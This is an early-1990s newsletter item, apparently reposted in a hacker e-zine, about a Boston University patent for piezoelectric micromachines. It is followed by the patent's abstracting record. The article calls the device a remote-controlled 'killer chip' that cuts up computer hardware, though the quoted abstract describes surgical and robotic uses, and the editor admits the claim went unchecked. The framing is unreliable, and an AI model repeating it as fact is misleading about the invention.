Availible Jean-Bernard Condat General Secretary Chaos Computer Club France B.P. 8005 69351 Lyon Cedex 08, France Tel.: +33 78 61 15 88 Intelligence Newsletter (10 rue du Sentier, 75002 Paris, France) No. 186 (Jan. 29, 1992), page 2, ISSN 0997-7139 By: Jean-Bernard Condat (CCCF, B.P. 8005, 69351 Lyon Cedex 08, France) The military use of computer viruses is often overblown, if not just simple disinformation as in the recent Iraqi case. But researchers at Boston University have developed and patented (U.S. patent 5 049 775) an infinitely more offensive and effective anti-computer agent: the silicon ant. Micro-electronics has perfected technologies for making toys and machines so small that they are invisible. Using piezoelectric ceramics which expand or contract under an electric current, the researchers constructed a microscopic ship with three "legs" on each side and a "cutter" in front. By alternating current in different sides of each "leg", it bends forward or backward. Under remote control the killer chips can be "walked" into a computer and cut up other microscopic chips, turn around and "walk" away, leaving invisible damage in the computer system. The killer chips could be solar powered and therefore have an indefinite life-span. PATENT DESCRIPTION 008245420 WPI Acc No: 90-132421/17 XRPX Acc No: N90-102550 Piezoelectric micro-machine or robot basic operating unit - made by covering silicon cantilever beams projecting from frame with piezoelectric material when applied voltages cause them to deflect Patent Assignee: (UYBO-) BOSTON UNIV Author (inventor): SMITS J G Number of Patents: 002 Patent Family: CC Number Kind Date Week WO 9003665 A 900405 9017 (Basic) US 5049775 A 910917 9140 Priority Data (CC,No,Date): US 251565 (880930); Applications (CC,No,Date): WO 89US4129 (890921); EP and/or WO Language: English EP and/or WO Cited Patents: No.SR.Pub Designated States (National): JP (Regional): AT; BE; CH; DE; FR; GB; IT; LU ; NL; SE Abstract (Basic): WO 9003665 An electrical micromachine is made by securing films (20,22) of piezoelectric material to the top surfaces (16,18) of crystalline silicon beams (12,14) projecting from a crystalline silicon body (10) to form a bimorph structure. A potential applied across the ends (24,26) of the piezoelectric films causes the beams to deflect. The piezoelectric material used is zinc oxide. A number of such micromachines can be assembled to form a robot, and when a foot (30) is provided the machine can move itself along a surface by sequential deflecting and straightening of the beams. The foot can be associated with a toothed wheel to produce rotary motion. The micromachine may be solar powered, and can be associated with sensors or a microprocessor with programmable memory. USE - Microsurgical tools, and robots for grasping, carrying or cutting tasks. @(33pp Dwg.No.1/10)@ Abstract (US): 9140 US 5049775 The piezoelectric actuation machine comprises two cantilever beams extending from a frame. The beams comprise a piezoelectric material such that application of an electric potential across the material of each beam rotationally diplaces the first and second beams relative to each other. An actuating member is secured between displaceable surfaces on the beams and extends orthogonally from a plane through the beams such that relative displacement of the beams displaces a portion of the member in a direction orthogonal to beam displacement. A rigid object contacting the displaced portion of the member is translated relative to the member and the frame. USE - For piezoelectric micromachines e.g. small robot or cutting tool. @(17pp)@ File Segment: EPI Derwent Class: S05; V06; X25; R46; Int Pat Class: H01L-041/09 Manual Codes (EPI/S-X): S05-B; V06-M06D; X25-A03E [Editor's Note: I have not investigated to see if this patent really does exist due to the timing of the article so close to the release date. This is a rush-in and I am basing all of its credibility to Chaos Computer Club France (CCCF) and Jean-Bernard Condat.] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-